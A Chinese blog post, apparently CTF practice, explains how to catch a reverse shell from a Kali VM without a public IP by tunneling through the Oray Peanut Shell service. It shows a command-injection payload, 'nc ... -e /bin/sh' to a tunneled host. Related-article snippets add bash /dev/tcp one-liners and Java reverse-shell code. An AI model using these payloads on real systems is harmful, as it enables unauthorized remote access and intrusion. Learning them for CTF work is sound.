【Try to Hack】无公网ip如何反弹shell

最新推荐文章于 2024-04-15 00:44:01 发布
最新推荐文章于 2024-04-15 00:44:01 发布
阅读量1.9k 收藏 6
点赞数 1
文章标签: 反弹shell 内网穿透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/125361131
版权

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月19日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

学自这个视频

内网kali端口监听
nc -lvvnp 54321
在这里插入图片描述

进行内网穿透,下载花生壳(免费的),需要注册才可以下载
https://www.oray.com/
在这里插入图片描述
在这里插入图片描述
点击映射数,会跳转到浏览器
在这里插入图片描述
点击新增映射
在这里插入图片描述
内网主机为kali的IP
在这里插入图片描述
分配了域名和端口

打开一个题目
在这里插入图片描述
传参?cmd=system("nc s546459d57.zicp.fun 23494 -e /bin/sh");
s546459d57.zicp.fun 23494为分配的域名和端口

反弹shell

开心星人
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)
冬萍子癸水
05-26 1112
1 扫描 主要就是80进web搜集信息 C:\root> nmap -A 10.10.16.216 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.64 secon
java获取公网IP
06-15
在IT行业中,公网IP(Public IP)是指互联网上唯一标识一台设备的IP地址,与之相对的是私网IP(Private IP),后者在局域网内部使用。公网IP是全球唯一的,使得任何网络上的设备都能通过它进行通信。本文将详细讨论...
VC 获取公网 ip 地址
08-07
参考了部分网友的资源,改写了一个获取公网IP地址的方法。忘记了网友网址,如冒犯,请原谅!发布此代码的目的旨在交流。代码如下: //头文件 #include "afxinet.h" //获取公网IP地址 CString getLocalIpAddress() { CInternetSession session; //声明该对象为获取网页属性做准备 CHttpFile *pFile=NULL; CString str,ch; CString m_szSite="http://www.zu14.cn/ip/"; //该地址是获取外网IP的关 键,原理就是通过该地址来获取外网IPtry{ pFile=(CHttpFile*)session.OpenURL(m_szSite);} //打开该地 址 catch(CInternetException *pEx) //错误处理 { pFile=NULL; pEx->Delete(); } if(pFile) { while(pFile->ReadString(str)) //读入该字符串 { ch+=str+"\r\n"; } pFile->Close(); delete pFile; } else { ch+=""; } return ch;//返回公网IP地址 } CString jian(CString ch) { CString aaa; for(int i=0;i<ch.GetLength();i++) { if(ch.Mid(i,1)=='0'||ch.Mid(i,1)=='1'||ch.Mid(i,1) =='2'||ch.Mid(i,1)=='3'||ch.Mid(i,1)=='4'||ch.Mid(i,1)=='5'||ch.Mid(i,1) =='6'||ch.Mid(i,1)=='7'||ch.Mid(i,1)=='8'||ch.Mid(i,1)=='9'||ch.Mid(i,1)=='.') aaa+=ch.Mid(i,1); else break; } return(aaa); }
内网渗透-常用反弹shell方法总结
最新发布
lza20001103的博客
04-15 1880
内网渗透-常用反弹shell方法总结
公网ip反弹shel
m0_52432374的博客
04-30 424
公网ip反弹shell
lq22222的博客
10-06 444
因为在kali虚拟上配置的,想要直接在kali虚拟机上面监听,所以内网主机ip地址我们这里选择127.0.0.1,端口任意大数字,我们选择54321,其他都默认,点击确定,这样我们的公网ip就配置好了。相信师傅们在打ctf靶场时都会遇到一个问题,就是部分题目需要一个有公网ip的服务器来反弹shell,但是vps很难找到免费的;这里就给大家推荐一个好用的平台————贝锐花生壳。映射类型选择TCP,映射模板选择SSH服务,然后外网域名下拉就会出现一个随机分配的域名,直接选上即可。此时再看kali终端。
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9306
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
各种shell反弹方法
weixin_46626737的博客
05-16 2450
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
AODI_自动化公网IP获取_
09-28
标题"AODI_自动化公网IP获取_"所涉及的知识点主要集中在如何通过自动化脚本获取并监控家庭公网IP地址。在互联网环境中,公网IP是互联网上唯一标识设备的地址,对于远程访问、远程桌面、在线协作或者物联网设备的远程...
try-hack-me:TryHackMe.com实验室
04-04
在"try-hack-me-main"这个压缩包中,很可能是包含了TryHackMe某个实验室的主要文件和资源。这可能包括虚拟机映像、练习文档、解决方案指南、提示和挑战,以及可能的脚本或代码示例。用户在解压后,可以通过导入这些...
await-to-js:异步await包装器,可轻松处理错误,而无需try-catch
02-28
import to from 'await-to-js' ; // If you use CommonJS (i.e NodeJS environment), it should be: // const to = require('await-to-js').default; async function asyncTaskWithCb ( cb ) { let err , user , ...
tryhackme--Kenobi
qq_43200143的博客
12-11 469
信息收集,nmap扫描 Samba枚举 利用nmap的脚本 nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target 发现三个分享 进行smb连接 smbclient //<ip>//sharename 又是一个 未设置密码就可以登录的,发现有一个文件在里面 递归下载文件(不用用户名密码)smbget -R smb://<ip&gt...
反弹shell常见方法总结
qq_45746681的博客
10-08 724
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 823
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
端口映射后的公网反弹shell
来到了学渣的博客
04-01 3038
前言: 渗透一个网站最后获取该web服务器权限的时候,可能会思考,如何把公网IP反弹到自己内网(私有ip)的虚拟机上?这时候我们就需要把内网的ip和端口映射成一个公网ip和端口从而实现内网穿透。 这里我用的是NATAPP,一个基于ngrok的国内高速内网转发工具 https://natapp.cn/register 首先快速注册,然后购买免费隧道(非常适合我这样的穷学生) 我这里用的是TC...
内网渗透---反弹shell详解(内有各种姿势的详细过程)
weixin_45588247的博客
04-08 3160
声明:文章技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可用于 违法犯罪,一经发现直接上报国家安全机关处理. 反弹shell 反弹shell: 在攻击者机器获得受害者机器的命令行。 文章目录反弹shell背景:正向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:反向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:其他方式反弹shell:msf反弹:实验环境:实验步骤:bash反弹:实验环境:实验步骤:python反弹:实验环境:实验步骤:php反弹:实验环境:实验步骤:p.
【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...
djph26741的博客
07-09 1069
反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢?1.某客户机中了你的网马,但是它在局域网内,你...
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
java 反弹shell
09-08
Java可以通过使用`java.lang.Runtime`类来执行系统命令,从而实现反弹shell。下面是一个简单的示例代码: ```java import java.io.*; public class ReverseShell { public static void main(String[] args) { try { String command = "/bin/bash -c '/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1'"; Process process = Runtime.getRuntime().exec(command); BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } process.waitFor(); } catch (IOException | InterruptedException e) { e.printStackTrace(); } } } ``` 请注意将`your_ip`和`your_port`替换为您自己的IP地址和端口号。此代码将执行一个Bash命令,通过TCP连接将shell反弹到指定的IP地址和端口号上。 然而,要谨慎使用反弹shell这样的功能,因为它可能会被滥用。确保只在合法和授权的环境中使用,并遵守所有法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值